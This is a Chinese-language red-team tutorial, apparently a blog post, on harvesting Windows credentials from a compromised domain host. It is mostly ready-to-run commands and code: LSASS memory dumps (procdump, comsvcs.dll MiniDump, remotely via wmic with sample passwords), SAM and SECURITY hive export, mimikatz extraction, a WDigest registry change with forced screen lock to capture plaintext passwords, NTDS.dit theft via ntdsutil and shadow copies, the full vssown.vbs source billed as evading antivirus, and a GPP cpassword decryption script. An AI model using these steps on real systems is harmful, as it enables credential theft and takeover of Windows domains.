内网渗透-windows获取(本地、域、Ntds.dit)登录凭证实战手法总结（超详细）_windows内网渗透步骤

一、前言

  当获取一台域内主机权限时，接下来的渗透思路就是要获取更高权限的账号，用来访问域控或横向拓展，那么在获取本地用户、域用户凭证和获取域控Ntds.dit这一块就极其重要，以下内容将详细介绍红队渗透中使用获取登录凭证的手法，获取本地用户密码、域用户密码、NTLM hash值与Ntdis.dit。NTLM hash值可用于解析明文、哈希传递和构造票据的攻击手法，之后也会详细介绍。文章中附带相关工具官网下载链接，如果访问不了需要下载请看总结部分。

还不会搭建域环境的同学先看以下这篇详细教程：https://blog.csdn.net/syl321314362/article/details/128838068

二、前置知识

2.1 Sam、System、Security

  sam：存储账号hash，并以syskey加密。
  system：存储syske，用来解密sam。
  security：存储lsass缓存，并以syskey加密。

2.2 Lsass

  lsass.exe 是一个系统重要进程用于微软Windows系统的安全机制。它用于本地安全和登录策略。而SAM的功能就固定于 lsass.exe 中但是 lsass.exe 不仅仅只进行本地身份认证所有正确通过本地、远程身份认证的用户信息都会保存在 lsass.exe 的内存中。

三、本地用户凭证

# 默认位置
system文件位置:C:\Windows\System32\config\SYSTEM
sam文件位置:C:\Windows\System32\config\SAM
sercurity文件位置:C:\Windows\System32\config\sercurity
1
2
3
4

3.1 Procdump 微软签名工具导出 Lsass

# 微软签名的工具
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
1
2

# 导出lsass
procdump64.exe  -accepteula -ma lsass.exe lsass
1
2

3.2 Comsvcs.dll 自带 Minidump 函数导出 Lsass

# comsvcs.dll自带 Minidump 函数导出lsass
# 查看lsass进程id
tasklist | findstr "lsass.exe"
# 拷贝重命名comsvcs.dll
copy C:\windows\System32\comsvcs.dll c:\windows\temp\temp.dll
# powershell执行minidump
powershell -exec bypass -command "C:\windows\system32\rundll32.exe c:\windows\temp\temp.dll, MiniDump 448 c:\windows\temp\lsass.dmp full"
# 删除temp.dll
del /f /q c:\windows\temp\temp.dll
1
2
3
4
5
6
7
8
9

3.2.1 Wmic 远程执行 Minidump

wmic /node:192.168.1.1 /user:yishuo\admin /password:"Qwert!2345" process call create "cmd /c tasklist | findstr \"lsass.exe\" > c:\\windows\\temp\\1.txt"

type \\192.168.1.1\c$\windows\temp\1.txt

wmic /node:192.168.1.1 /user:yishuo\admin /password:"Qwert!2345" process call create "cmd /c copy /y C:\\windows\\System32\\comsvcs.dll c:\\windows\\temp\\temp.dll"

dir \\192.168.1.1\c$\windows\temp\temp.dll

wmic /node:192.168.1.1 /user:yishuo\admin /password:"Qwert!2345" process call create "cmd /c powershell -exec bypass -command C:\\windows\\system32\\rundll32.exe c:\\windows\\temp\\temp.dll MiniDump 460 c:\\windows\\temp\\lsass.dmp full"

dir \\192.168.1.1\c$\windows\temp\lsass.dmp

copy \\192.168.1.1\c$\windows\temp\lsass.dmp c:\users\public\lsass.dmp

del /q /f \\192.168.1.1\c$\windows\temp\lsass.dmp \\192.168.1.1\c$\windows\temp\temp.dll
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

3.2.2 解析 Lsass

# mimikatz解析lsass
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords
1
2
3

3.3 Reg 导出 Sam、System、Security

# 需要管理员权限
reg save hklm\sam c:\windows\temp\sam
reg save hklm\system c:\windows\temp\system
reg save hklm\security c:\windows\temp\security
1
2
3
4

3.3.1 Wmic 远程执行 Reg 导出 Sam、System、Security

wmic /node:192.168.1.5 /user:yishuo\admin /password:"Qwert!2345" process call create "cmd /c reg save hklm\\sam sam.hive"
dir \\192.168.1.5\c$\windows\temp\sam.hive
1
2

3.3.2 解析 Sam、System、Security

# 使用impacket中的secretsdump.py
# 工具下载链接：
# https://github.com/fortra/impacket
# secretsdump.py 使用步骤：
# 1、先安装第三方库 pip install -r requirements.txt 和 python setup.py install
# 2、在目录下找到secretsdump.py文件执行以下命令
python secretsdump.py -sam sam.hive -security security.hive -system system.hive local

# mimikatz
mimikatz "lsadump::sam /sam:sam /system:system /security:security"
1
2
3
4
5
6
7
8
9
10

3.4 Mimikatz 获取密码凭证

# 工具下载链接：
# https://github.com/gentilkiwi/mimikatz/releases
# 需要管理员权限，并且被defender等查杀
privilege::debug
sekurlsa::logonpasswords
1
2
3
4
5

3.4.1 Server 2008 以上系统抓不到明文密码解决方案

# server 2008 及以下版本系统可直接抓取明文密码
# 要抓08以上密码需要修改注册表
# 手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录 + 导出Hash + 本地mimikatz抓明文

# 查询 
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

#修改注册表来让Wdigest Auth保存明文口令
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

#恢复
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

#强制锁屏
rundll32.exe user32.dll,LockWorkStation

# 强制锁屏 powershell
Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

四、域用户凭证

在DC上执行

Active Directory 数据库 (ntds.dit)

Ntds.dit(也被称为Active Directory database)包含了当前域用户中所有的用户的账号信息，和其HASH值。

# 默认位置
ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit
system文件位置:C:\Windows\System32\config\SYSTEM
sam文件位置:C:\Windows\System32\config\SAM
1
2
3
4

4.1 使用 NTDSUtil 在 DC 上本地获取 Ntds.dit 文件

推荐使用

#本地获取
ntdsutil "ac i ntds" "ifm" "create full c:\windows\temp\winstore" q q

#wmic远程获取
wmic /node:192.168.1.137 /user:rootkit.org\administrator /password:admin!@#45 process call create "cmd /c ntdsutil \"ac i ntds\" \"ifm\" \"create full c:\\windows\\temp\\winstore\" q q"

#powershell执行
powershell -exec bypass -command "ntdsutil \"ac i ntds\" \"ifm\" \"create full c:\\windows\\temp\\winstore\" q q"
1
2
3
4
5
6
7
8

4.2 使用 VSS 卷影副本远程拉取 Ntds.dit

4.2.1 Vssadmin命令获取 Ntdis .dit

#使用方法，需要管理员权限
#1、本地操作
#（1）创建c盘卷影，获副本卷名
vssadmin create shadow /for=c:\
#（2）从卷影拷贝ntds.dit
copy [副本卷名]\windows\ntds\ntds.dit c:\$Recycle.bin\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\$Recycle.bin\ntds.dit
dir c:\$Recycle.bin\ntds.dit
#（3）删除卷影vssadmin 
vssadmin delete shadows /for=c: /quiet
#（4）查看卷影列表
vssadmin list shadows
1
2
3
4
5
6
7
8
9
10
11
12

4.2.2 Vssown.vbs 脚本获取 Ntdis.dit

目前免杀率0/55
#文件需要落地
#下载链接https://raw.githubusercontent.com/borigue/ptscripts/master/windows/vssown.vbs
#用法
cscript vssown.vbs /start
cscript vssown.vbs /create c
cscript vssown.vbs /list
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
1
2
3
4
5
6
7
8

vssown.vbs 脚本源码

REM Volume Shadow Copy Management from CLI.
REM Part of the presentation "Lurking in the Shadows" by Mark Baggett and Tim "LaNMaSteR53" Tomes.
REM Co-developed by Mark Baggett (@MarkBaggett) and Tim Tomes (@lanmaster53).

Set args = WScript.Arguments

if args.Count < 1  Then
  wscript.Echo "Usage: cscript vssown.vbs [option]"
  wscript.Echo
  wscript.Echo "  Options:"
  wscript.Echo
  wscript.Echo "  /list                             - List current volume shadow copies."
  wscript.Echo "  /start                            - Start the shadow copy service."
  wscript.Echo "  /stop                             - Halt the shadow copy service."
  wscript.Echo "  /status                           - Show status of shadow copy service."
  wscript.Echo "  /mode                             - Display the shadow copy service start mode."
  wscript.Echo "  /mode [Manual|Automatic|Disabled] - Change the shadow copy service start mode."
  wscript.Echo "  /create [drive_letter]            - Create a shadow copy."
  wscript.Echo "  /delete [id|*]                    - Delete a specified or all shadow copies."
  wscript.Echo "  /mount [path] [device_object]     - Mount a shadow copy to the given path."
  wscript.Echo "  /execute [\path\to\file]          - Launch executable from within an umounted shadow copy."
  wscript.Echo "  /store                            - Display storage statistics."
  wscript.Echo "  /size [bytes]                     - Set drive space reserved for shadow copies."
  REM build_off
  wscript.Echo "  /build [filename]                 - Print pasteable script to stdout."REM no_build
  REM build_on
  wscript.Quit(0)
End If

strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

Select Case args.Item(0)

  Case "/list"
    Wscript.Echo "SHADOW COPIES"
    Wscript.Echo "============="
    Wscript.Echo
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowCopy")
    For Each objItem in colItems
      Wscript.Echo "[*] ID:                  " & objItem.ID
      Wscript.Echo "[*] Client accessible:   " & objItem.ClientAccessible
      Wscript.Echo "[*] Count:               " & objItem.Count
      Wscript.Echo "[*] Device object:       " & objItem.DeviceObject
      Wscript.Echo "[*] Differential:        " & objItem.Differential
      Wscript.Echo "[*] Exposed locally:     " & objItem.ExposedLocally
      Wscript.Echo "[*] Exposed name:        " & objItem.ExposedName
      Wscript.Echo "[*] Exposed remotely:    " & objItem.ExposedRemotely
      Wscript.Echo "[*] Hardware assisted:   " & objItem.HardwareAssisted
      Wscript.Echo "[*] Imported:            " & objItem.Imported
      Wscript.Echo "[*] No auto release:     " & objItem.NoAutoRelease
      Wscript.Echo "[*] Not surfaced:        " & objItem.NotSurfaced
      Wscript.Echo "[*] No writers:          " & objItem.NoWriters
      Wscript.Echo "[*] Originating machine: " & objItem.OriginatingMachine
      Wscript.Echo "[*] Persistent:          " & objItem.Persistent
      Wscript.Echo "[*] Plex:                " & objItem.Plex
      Wscript.Echo "[*] Provider ID:         " & objItem.ProviderID
      Wscript.Echo "[*] Service machine:     " & objItem.ServiceMachine
      Wscript.Echo "[*] Set ID:              " & objItem.SetID
      Wscript.Echo "[*] State:               " & objItem.State
      Wscript.Echo "[*] Transportable:       " & objItem.Transportable
      Wscript.Echo "[*] Volume name:         " & objItem.VolumeName
      Wscript.Echo
    Next
    wscript.Quit(0)

  Case "/start"
    Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
    For Each objService in colListOfServices
      objService.StartService()
      Wscript.Echo "[*] Signal sent to start the " & objService.Name & " service."
    Next
    wscript.Quit(0)

  Case "/stop"
    Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
    For Each objService in colListOfServices
      objService.StopService()
      Wscript.Echo "[*] Signal sent to stop the " & objService.Name & " service."
    Next
    wscript.Quit(0)

  Case "/status"
    Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
    For Each objService in colListOfServices
      Wscript.Echo "[*] " & objService.State
    Next
    wscript.Quit(0)

  Case "/mode"
    Set colListOfServices = objWMIService.ExecQuery("Select * from Win32_Service Where Name ='VSS'")
    For Each objService in colListOfServices
      if args.Count < 2 Then
        Wscript.Echo "[*] " & objService.Name & " service set to '" & objService.StartMode & "' start mode."        
      Else
        mode = LCase(args.Item(1))
        if mode = "manual" or mode = "automatic" or mode = "disabled" Then
          errResult = objService.ChangeStartMode(mode)
          Wscript.Echo "[*] " & objService.Name & " service set to '" & mode & "' start mode."
        Else
          Wscript.Echo "[*] '" & mode & "' is not a valid start mode."
        End If
      END If
    Next
    wscript.Quit(errResult)    

  Case "/create"
    VOLUME = args.Item(1) & ":\"
    Const CONTEXT = "ClientAccessible"
    Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
    Wscript.Echo "[*] Attempting to create a shadow copy."
    errResult = objShadowStorage.Create(VOLUME, CONTEXT, strShadowID)
    wscript.Quit(errResult)

  Case "/delete"
    id = args.Item(1)
    Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
    For Each objItem in colItems
      if objItem.ID = id Then
        Wscript.Echo "[*] Attempting to delete shadow copy with ID: " & id
        errResult = objItem.Delete_
      ElseIf id = "*" Then
        Wscript.Echo "[*] Attempting to delete shadow copy " & objItem.DeviceObject & "."
        errResult = objItem.Delete_
      End If
    Next
    wscript.Quit(errResult)

  Case "/mount"
    Set WshShell = WScript.CreateObject("WScript.Shell")
    link = args.Item(1)
    sc = args.Item(2) & "\"
    cmd = "cmd /C mklink /D " & link & " " & sc
    WshShell.Run cmd, 2, true
    Wscript.Echo "[*] " & sc & " has been mounted to " & link & "."
    wscript.Quit(0)

  Case "/execute"
    file = args.Item(1)
    Set colItems = objWMIService.ExecQuery("Select * From Win32_ShadowCopy")
    Set objProcess = objWMIService.Get("Win32_Process")
    For Each objItem in colItems
      path = Replace(objItem.DeviceObject,"?",".") & file
      intReturn = objProcess.Create(path)
      if intReturn <> 0 Then
        wscript.Echo "[*] Process could not be created from " & path & "."
        wscript.Echo "[*] ReturnValue = " & intReturn
      Else
        wscript.Echo "[!] Process created from " & path & "."
        wscript.Quit(0)
      End If
    Next
    wscript.Quit(0)

  Case "/store"
    Wscript.Echo "SHADOW STORAGE"
    Wscript.Echo "=============="
    Wscript.Echo
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage")
    For Each objItem in colItems
        Wscript.Echo "[*] Allocated space:     " & FormatNumber(objItem.AllocatedSpace / 1000000,0) & "MB"
        Wscript.Echo "[*] Maximum size:        " & FormatNumber(objItem.MaxSpace / 1000000,0) & "MB"
        Wscript.Echo "[*] Used space:          " & FormatNumber(objItem.UsedSpace / 1000000,0) & "MB"
        Wscript.Echo
    Next
    wscript.Quit(0)

  Case "/size"
    storagesize = CDbl(args.Item(1))
    Set colItems = objWMIService.ExecQuery("Select * from Win32_ShadowStorage")
    For Each objItem in colItems
      objItem.MaxSpace = storagesize
      objItem.Put_
    Next
    Wscript.Echo "[*] Shadow storage space has been set to " & FormatNumber(storagesize / 1000000,0) & "MB."
    wscript.Quit(0)

  REM build_off
  Case "/build"
    build = 1
    Const ForReading = 1
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objTextFile = objFSO.OpenTextFile("vssown.vbs", ForReading)
    Do Until objTextFile.AtEndOfStream
      strNextLine = objTextFile.Readline
      if InStr(strNextLine,"REM build_off") = 3 Then
        build = 0
      End If
      if strNextLine <> "" and build = 1 Then
        strNextLine = Replace(strNextLine,"&","^&")
        strNextLine = Replace(strNextLine,">","^>")
        strNextLine = Replace(strNextLine,"<","^<")
        wscript.Echo "echo " & strNextLine & " >> " & args.Item(1)
      End If
      if InStr(strNextLine,"REM build_on") = 3 Then
        build = 1
      End If
    Loop
    wscript.Quit(0)
  REM build_on

End Select
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202

4.3 解析 Ntds.dit

python impacket-master/examples/secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL 
1

4.4 SYSVOL 和 GPP（组策略偏好）的密码

4.4.1 SYSVOL介绍

  sysvol是一个文件夹，在新建域控的时候会被自动创建，默认目录在c:\windows\sysvol，它是一个共享文件夹，用来存储域上的一些公共文件。sysvol会在域控之间进行复制，保证每台域控的sysvol是同步的。
  但这个sysvol对系统有要求，如果是2003的系统，那么域管账号密码会直接以明文形式存在，之后的像2008，变成了密文，加密是aes256，但密钥进行了公开，所以可以利用脚本直接解密，针对这个问题，微软发了相关的补丁，补丁号是KB2962486，打了这个补丁，域管再进行组策略设置，就不需要输入账号密码了，2012，不打补丁还是有这个隐患，但再往后2016及之后，就默认不可以了。
所以针对2012及之前的服务器，没有打补丁的情况下，可以利用。

例如：

C:\Windows\SYSVOL\sysvol\rootkit.org\Policies\{AF792A2C-BF19-4B22-84C7-A793D0D822B3}\Machine\Preferences\Groups\groups.xml
1

查找xml文件

#本地
findstr /s /i "cpassword" C:\Windows\SYSVOL\*.xml
#远程
findstr /s /i "cpassword" \\192.168.1.1\C$\Windows\SYSVOL\*.xml
1
2
3
4

4.4.2 本地解析GPPPassword

微软官网发布了可用于解密密码的 AES 加密密钥（共享机密）

#解密脚本
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import unpad
import base64
def decrypt_password(pw_enc_b64):
        if len(pw_enc_b64) != 0:
            # thank you MS for publishing the key :) (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be)
            key = b'\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20' \
                  b'\x9b\x09\xa4\x33\xb6\x6c\x1b'
            # thank you MS for using a fixed IV :)
            iv = b'\x00' * 16
            pad = len(pw_enc_b64) % 4
            if pad == 1:
                pw_enc_b64 = pw_enc_b64[:-1]
            elif pad == 2 or pad == 3:
                pw_enc_b64 += '=' * (4 - pad)
            pw_enc = base64.b64decode(pw_enc_b64)
            ctx = AES.new(key, AES.MODE_CBC, iv)
            pw_dec = unpad(ctx.decrypt(pw_enc), ctx.block_size)
            return pw_dec.decode('utf-16-le')
        else:
            logging.debug("cpassword is empty, cannot decrypt anything")
            return ""
# 输入GPPPassword进行解密
print(decrypt_password("Hd/xxCN9bFRTj8C2az+0t3el0u3Dn68pZ1Sd4IHmbPw"))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

4.4.3 自动化获取GPPPassword

https://github.com/ShutdownRepo/Get-GPPPassword
# 远程本地都可以
# 先安装第三方库 pip install -r requirements.txt
python Get-GPPPassword.py admin:Qwert!2345@192.168.1.1
1
2
3
4

五、总结

  红队常用获取本地账户和域用户密码的攻击手法总结，各位师傅有好的意见和建议欢迎评论指教，感谢。微信公众号搜索关注艺说IT，发送消息：凭证工具，立即获取下载链接。对你有用的话请一键三连，感谢。